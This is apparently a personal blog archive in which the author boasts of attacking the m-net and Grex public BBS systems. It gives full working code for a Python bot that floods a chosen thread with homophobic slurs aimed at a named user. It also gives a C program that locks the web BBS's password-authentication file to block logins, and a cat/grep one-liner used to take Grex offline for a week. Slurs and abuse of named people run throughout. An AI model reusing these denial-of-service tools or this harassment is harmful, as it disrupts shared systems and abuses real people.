Archive for the ‘M-net/Grex stuff’ Category

Flooding the m-net BBS

December 28, 2010

History
Once upon a time I got banned from m-net for computer hacking. Then, maybe like a week ago, the powers that be let me back on the system. I noticed right away that nothing changed. All I saw were a bunch of hose head “IT Professionals” gloating about all their wonderful work experience. Yet the same old crappy software bugs still existed. Then I started to wonder out loud “What good is all the fucking professional IT experience if you can’t even fucking fix the damn software on this site. I mean, it’s not the the admins are telling you no. In fact, the three stooges that run this dump actually encourage people to do software patches on the system.”

So after like 2 hours on the BBS, I was once again having war of the words in the regulars. I would call some of the regulars “fat and bald”. And in return, they would call me “A drunk pervert that has confessed to wearing pantyhose out in public.”

There was one particular jerk off IT professional that really irked me. I kept telling this homo to go fuck off. But yet, he still argued with me. So I got fed up and wrote a BBS respond flooder. Basically, more or less, the script would automatically do a shit load of responses in any given thread. Ie a topic.

For example, Here would be a list of threads…

1 48 welcome to the december general conference item
2 4 december system problems item
3 250 december announcements item
4 2 december other conferences on m-net item
5 62 december happy item

Thread 5 would be the “december happy item”. The number 62 would represent the number of actual responses, by various users, in thread number 5.

The lead up to the abuse
For whatever reasons, this ‘IT Professional, whom I shall refer to as the “homosexual ninny from england”, was really annoying me in thread 125. So I unleashed my script on this thread. Here is what the thread looked like..

125 1833 What would you buy Julian Assange for Christmas?

That’s right. There were over 1800 responses in that thread. And is part out the output from the script itself..

Item 125 entered Sat, Dec 18, 2010 (15:29) by Sam (chiquita)
What would you buy Julian Assange for Christmas?

1816 new of 1833 responses total.

#18 Proud wife beater (duality) Sat, Dec 18, 2010 (18:56):
mart isnt bright

#19 Proud wife beater (duality) Sat, Dec 18, 2010 (18:56):
mart is a homosexual

#20 Proud wife beater (duality) Sat, Dec 18, 2010 (18:56):
mart takes it up the ass from cross

#21 Proud wife beater (duality) Sat, Dec 18, 2010 (18:57):
mart can go fuck off

#22 Proud wife beater (duality) Sat, Dec 18, 2010 (18:57):
mart is a queer ass virgin

#23 Proud wife beater (duality) Sat, Dec 18, 2010 (18:57):
mart is a fag

Shortly after this happened, I was got all these lame accusations that I was just doing some kind of copy and paste job. So to rebuke all these fags, I posted the entire working code on this site. And here it is…

#----------------------------------------------------------
#The script starts in non-interactive mode (aka bot mode).
#Press ctrl-c to get into interactive mode and 'ctrl ^]' to
#get back into non-interactive mode.
#
#And now a few comments...
#
#a)The script only works on the Linux Operating System.
#  This is because the program relies on the concept of a
#  "psuedo terminal". As far as I know, the closest you
#  can get to a "psuedo terminal" in Windows is using something
#  like cygwin.
#
#b)Using something like 'ctrl ^]' to get back into non-interactive
#  mode is something that is mentioned python pexpect module,
#  but not in the actual pexpect document itself. 
#
#---------------------------------------------------------

import pexpect, time, signal, getpass

#I need a large list of profanity because the computer doesn't always
#follow the Gaussian Probability curve.

profanity = ["mart is a fag", "mart is a homo", "mart is dumb",
             "mart is a retard", "mart is a moron", "mart is stupid",
             "mart is a virgin", "mart is gay", "mart isnt witty",
             "mart sucks dans dick", "mart sucks his moms dick",
             "mart can go fuck off", "mart likes little boys",
             "mart isnt bright", "mart is a homosexual",
             "mart takes it up the ass from cross", "mart can go fuck off"]

x = 1

def mode(sig, data):
    global x
    x = x + 1
    
def get_name():
    user = raw_input("Username: ")
    password = getpass.getpass("Password: ")
    idle(user,password)
    
def idle(user,password):
    y = 1
    max = len(profanity)
    count = 0
    
    bbs = pexpect.spawn('telnet arbornet.org')
    bbs.expect('login:')
    bbs.sendline(user)
    print bbs.before,bbs.after,
    bbs.expect('[Pp]assword:')
    bbs.sendline(password)
    bbs.sendline('\n')
    bbs.sendline('bbs')

    while bbs.isalive():
        if ((y % x ) == 0):
            bbs.expect('Ok: ')
            bbs.sendline('r noresp 125')
            bbs.expect('Respond or pass?')
            bbs.sendline('r')
            bbs.expect('>')
            if count < max:
                bbs.sendline(profanity[count])
                count = count + 1
            else:
                count = 0
                bbs.sendline('mart is a queer ass virgin')
            bbs.sendline('.')
            time.sleep(5)
        else:
            bbs.interact()
            y = y + 1
        
if __name__ == "__main__":
    signal.signal(signal.SIGINT, mode)
    get_name()        

The actual deleting of the BBS item
So I began to wonder if I could max out the number of responses in any given thread. And if so, what would happen. This line of thinking stems from freshman level Calculus at UW. You see, I had professor that always told us “All the interesting math happens at the boundaries of a function.” So, uhhh…, like… I just extended this concept to the realm of computer programming. I swear to god this isn’t made up. Quit laughing and fucking give me some mother fucking support.

So I ran the script for like maybe 90 minutes. After that, I got the following error messages on my computer…

[cdalten@localhost oakland]$ ./mnut.py
Username: duality
Password:
Trying 69.39.89.95…
Connected to arbornet.org (69.39.89.95).
Escape character is ‘^]’.

FreeBSD/i386 (m-net.arbornet.org) (ttypn)

login:
Traceback (most recent call last):
File “./mnut.py”, line 97, in ?
get_name()
File “./mnut.py”, line 45, in get_name
idle(user,password)
File “./mnut.py”, line 82, in idle
bbs.expect(‘>’)
File “/usr/lib/python2.4/site-packages/pexpect.py”, line 1311, in expect
return self.expect_list(compiled_pattern_list, timeout, searchwindowsize)
File “/usr/lib/python2.4/site-packages/pexpect.py”, line 1325, in expect_list
return self.expect_loop(searcher_re(pattern_list), timeout, searchwindowsize)
File “/usr/lib/python2.4/site-packages/pexpect.py”, line 1409, in expect_loop
raise TIMEOUT (str(e) + ‘\n’ + str(self))
pexpect.TIMEOUT: Timeout exceeded in read_nonblocking().

version: 2.3 ($Revision: 399 $)
command: /usr/kerberos/bin/telnet
args: [‘/usr/kerberos/bin/telnet’, ‘arbornet.org’]
searcher: searcher_re:
0: re.compile(“>”)
buffer (last 100 chars): ? r
Too many responses on this item!

Respond or pass?
before (last 100 chars): ? r
Too many responses on this item!

Respond or pass?
after: pexpect.TIMEOUT
match: None
match_index: None
exitstatus: None
flag_eof: False
pid: 30555
child_fd: 3
closed: False
timeout: 30
delimiter: pexpect.EOF
logfile: None
logfile_read: None
logfile_send: None
maxread: 2000
ignorecase: False
searchwindowsize: None
delaybeforesend: 0.05
delayafterclose: 0.1
delayafterterminate: 0.1

Basically, I had entered in too many responses in thread 158. Uhh… yeah, more or less I tested my theory on thread 158. Why that thread? I have no idea. I was fucking drunk at the time, and uh like, I just sounded like the cool thing to do.

And here is what happened when I logged into the system to manually enter a response…

#1999 Proud wife beater (duality) Sun, Dec 26, 2010 (13:12):
MART IS GAY

Respond or pass? r
Too many responses on this item!

That’s right, The m-net bbs wouldn’t let me enter in response number 2000.

I saw the following when I looked looked at the threads on m-net…

158 1999 What did you get, fuckers?
159 5 Why the Hell didn’t she just call her neighbors?
160 0 The cat was allowed back upstairs after being the basement for two days. He is not quick to forgive…

Ok:

And then, when I browsed the threads again, I saw the following..

m-net% bbs
YAPP 3.1.1 Copyright (c)1995 Armidale Software
Registered to: Arbornet
Invalid format of sum file

155 2 ho hoe whoe
156 10 oy vey
157 7 ho rudolph red nosed reindeer got his red nose

Ok:

155 2 ho hoe whoe
156 10 oy vey
157 7 ho rudolph red nosed reindeer got his red nose
161 0 Nice censorship

Ok:

Threads 158 (the one I maxed out the responses with), 159, and 160 got deleted.

At first I thought the m-net admins just deleted the shit. But they told me no. So when I asked what happened, they told me it was a “system glitch”.

The aftermath
I’ve had a few people ask me to explain how the code works. I refuse to do that since I couldn’t do any justice to the explanation. I would say use google, but like googling isn’t enough. Instead, let me cite one of the comments made in one of the python modules used in this code..

[cdalten@localhost ~]$ more /usr/lib/python2.4/pty.py
“””Pseudo terminal utilities.”””

# Bugs: No signal handling. Doesn’t set slave termios and window size.
# Only tested on Linux.
# See: W. Richard Stevens. 1992. Advanced Programming in the
# UNIX Environment. Chapter 19.
# Author: Steen Lumholt — with additions by Guido.

The book is kind of expensive, hard to find, and not exactly easy to read. But I still feel that’s better than some half baked moronic response found on some loser unix forum site dominated by a bunch of moron “IT professionals” who have zero academic publications to their name.

How the m-net web BBS went down in 27 lines of C code

October 22, 2009

A Brief History of the Abuse
I think it was maybe around June of 2009 that web BBS (Bulletin Board System)portion of m-net went screwy. What would happen is that a user would enter their login name and correct password, but for whatever reasons, the system wouldn’t let them on.

Anyways, the homosexual Indian of m-net had decided to take a break from his $8.00/hr gardening job and then tried to figure out what was going on. He reasoned out that the source of the problem was me locking the pwauth.lock file. Ie, the file that controls password authentication for the web BBS on m-net.

Not only was he wrong, but it turns out that if a person places a lock over the pwauth.lock file, the m-net web BBS will stop taking requests. I guess it could maybe be considered a denial of service attack. So I ended up doing a proof of concept attack. I wrote the code in C so that the m-net staff couldn’t see the source code to the executable file. Below is the code that I used to demonstrate the attack. All I did was just compile and run it from the m-net shell.

#include <stdio.h>
#include <stdlib.h>

#include <fcntl.h>
#include <unistd.h>

#define BBS "/var/run/pwauth.lock"

int main(void) {
  int fd;

  if ((fd = open(BBS, O_RDONLY)) < 0) {
    fprintf(stderr, "Unable to open pwauth file\n");
    exit(EXIT_FAILURE);
  }

  if (flock(fd,LOCK_EX) == -1) {
    fprintf(stderr, "Unable to acquire lock\n");
    exit(EXIT_FAILURE);
  }

sleep(9999999);

close(fd);

exit(EXIT_SUCCESS);
}

Grex Grep Bug

October 22, 2009

Note: This bug doesn’t work on m-net. I verified this one day when tonster stepped away from the terminal so that he could have mad cybersex with trex.

Prelude
During January 2008 I was struggling to learn the concept of a Unix device driver. I think it was Barry out at MIT that told me the behavior of /dev/tty and the behavior of /dev/null were two different things. I was sort of mystified, so I just started playing with /dev/null. During one of my late night adventures I found out that

cat < /dev/zero > dev/null

ended up consuming 99% cpu time on my both Linux box and the Grex OpenBSD box. This shell combo by itself had no great impact on either systems because most Unix variants are I/O bound (vs cpu bound). I think this is the official starting point of what would later become known as the grep bug.

The lead up to the bug
I ended up asking about this behavior on comp.unix.questions. Here is the URL to that thread

Understanding /dev/null

Someone I knew read this thread and then modified it to the following

cat < /dev/zero | grep “f” > /dev/null &

I only found this out because this person was lagging Grex. Here is a copy of the email I got from him regarding the lag.

“whoa !

cat < /dev/zero | grep “f” > /dev/null &

run that a few times. maybe like 10 or so. it’s fun! thanks for the inspiration!

On 1/27/08, C D wrote:

> > load averages: 16.29, 15.21, 13.76 18:41:51
> > 323 processes: 314 idle, 7 stopped, 1 zombie, 1 on processor
> > CPU states: 25.0% user, 0.1% nice, 12.4% system, 1.0% interrupt, 61.5%
> > idle
> > Memory: Real: 176M/373M act/tot Free: 125M Swap: 342M/2048M used/tot > >
> > PID USERNAME PRI NICE SIZE RES STATE WAIT TIME CPU COMMAND
> > 4372 naftee -5 0 164M 146M sleep biowai 84:25 8.01% grep
> >
> >
> > What was the magical shell command to do this? > >
> >”

Basically, he didn’t realize that the modified shell combo caused the system (ie Grex) to slow down.

The attack and the aftermath
I had theorized that if someone would run 15 of these at once, they could effectively cause the entire system to hang. One of my friends actually put this theory to test. The end result was that he was able to take Grex offline for about a week. Once the system came back up, the Grex Users saw the following

login: mickeyd
Password:

Grex was down because a few sociopathic individuals have taken a great delight in exploiting a bug in the op system. This requires no great skill, just a deformed soul. Grex will be back up later today (thurs). STeve

Connection to grex.org closed by foreign host.

Life After Being Banned from M-net.

October 22, 2009

It’s been a little bit over a week since I got banned from M-net for computer hacking.  I thought about it and decided to never do this kind of stuff again.

So why did I start computer hacking in the first place? At first, it was the challenge. I saw m-net, and grex, as this vast public bbs system that was powered by some of the most original software that I had seen up to that point in my life. I just remember being in total awe. I was like “Wow, this is really f-cking cool. I really don’t this place for the IRC. The software that powers this joint looks far far more interesting.”

Then I started to learn the quirks in the system. I found out that some of these quirks could be used to halt parts of the system. This was ultimate adredenline rush for me. I had finally found a way channel all my anger, from my personal issues, via computer hacking. But this is when things got bad. I started to abuse the system to prevent users that I didn’t like from actually using m-net. Right before I had got banned, this person on m-net called slack told me try and vent my anger and aggression through a guitar vs computer hacking before I ended up in legal trouble.

I guess I should have taken her warning. Because shortly after her warning, this whole thing got so out of control that m-net banned me and then threatened to prosecute me for computer hacking.

So now, I’ve just decided to blog for the time being. I don’t know how long this will last. In between, I’ve also been trying to get help with some of my personal issues before I really do something that will land me in jail.